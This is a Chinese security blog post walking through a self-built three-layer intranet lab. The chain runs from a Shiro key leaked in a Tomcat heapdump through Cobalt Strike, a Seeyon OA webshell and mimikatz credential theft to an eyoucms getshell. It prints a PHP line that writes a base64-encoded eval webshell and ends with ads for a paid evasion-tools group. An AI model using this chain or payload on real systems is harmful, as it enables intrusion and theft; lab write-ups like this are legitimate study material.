实操 | 通关三层内网拿下主机

admin 2023年5月14日21:19:40评论19 views字数 1280阅读4分16秒阅读模式

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

实操 | 通关三层内网拿下主机

自建内网靶场

实操 | 通关三层内网拿下主机

https://github.com/yangzongzhuan/RuoYi/releases

实操 | 通关三层内网拿下主机

ruoyi-admintargetclassesapplication-druid.yml

修改数据库账号密码

实操 | 通关三层内网拿下主机

idea编译生成适配环境的jar包

数据库配置推荐:mysql5+、jdk1.8

新建数据库ry,导入sql目录的两个sql文件

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

成功运行

实操 | 通关三层内网拿下主机

检索cipherKey替换key

实操 | 通关三层内网拿下主机

除此以外,为了搭建存在的漏洞环境,还需要在pom.xml修改shiro的版本为有漏洞的版本

生成heapdump

1
C:Program FilesJavajdk1.8.0_301bin>jmap -dump:file=C:UsersPublicheapdump <pid>

实操 | 通关三层内网拿下主机

这样heapdump中便带有了shiro的key

实操 | 通关三层内网拿下主机

入口机器

80端口为若依系统,8081端口为tomcat管理界面

若依使用的是4.6的版本,存在前台shiro漏洞利用,但是key被修改了

实操 | 通关三层内网拿下主机

对8081端口tomcat页面进行目录扫描,发现存在heapdump

实操 | 通关三层内网拿下主机

使用工具进行利用,发现泄露的shiro key

实操 | 通关三层内网拿下主机

利用的时候记得勾选AES GCM不然会利用不成功

实操 | 通关三层内网拿下主机

内存马连接后上线cs

实操 | 通关三层内网拿下主机

对内网资产进行扫描

实操 | 通关三层内网拿下主机

第二台机器

访问192.168.1.3:81发现是致远oa

实操 | 通关三层内网拿下主机

使用历史漏洞ajax.do成功写入webshell

实操 | 通关三层内网拿下主机

使用天蝎进行连接

实操 | 通关三层内网拿下主机

使用cs建立smb隧道,生成正向beacon到致远机器上运行

实操 | 通关三层内网拿下主机

或者通过tcp回连

实操 | 通关三层内网拿下主机

mimikatz抓取密码,发现存在zzz账户

实操 | 通关三层内网拿下主机

登录zzz账户,在桌面上发现第二个flag

实操 | 通关三层内网拿下主机

第三台机器

并且通过浏览器记录发现其曾访问过http://192.168.2.3/,并保存了密码,指纹识别为eyoucms

eyoucms1.5.5存在后台getshell漏洞,尝试进行利用

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

写入webshell,连接成功后拿到第三个flag

1
<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机




付费圈子


欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

实操 | 通关三层内网拿下主机

进成员内部群


实操 | 通关三层内网拿下主机



实操 | 通关三层内网拿下主机

星球的最近主题和星球内部工具一些展示


实操 | 通关三层内网拿下主机


实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机

实操 | 通关三层内网拿下主机


实操 | 通关三层内网拿下主机

加入安全交流群


实操 | 通关三层内网拿下主机                                


关 注 有 礼



关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

实操 | 通关三层内网拿下主机 还在等什么?赶紧点击下方名片关注学习吧!实操 | 通关三层内网拿下主机


实操 | 通关三层内网拿下主机




干货|史上最全一句话木马


干货 | CS绕过vultr特征检测修改算法


实战 | 用中国人写的红队服务器搞一次内网穿透练习


实战 | 渗透某培训平台经历


实战 | 一次曲折的钓鱼溯源反制


免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦


原文始发于微信公众号(渗透安全团队):实操 | 通关三层内网拿下主机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月14日21:19:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实操 | 通关三层内网拿下主机https://cn-sec.com/archives/1731416.html

发表评论

匿名网友 填写信息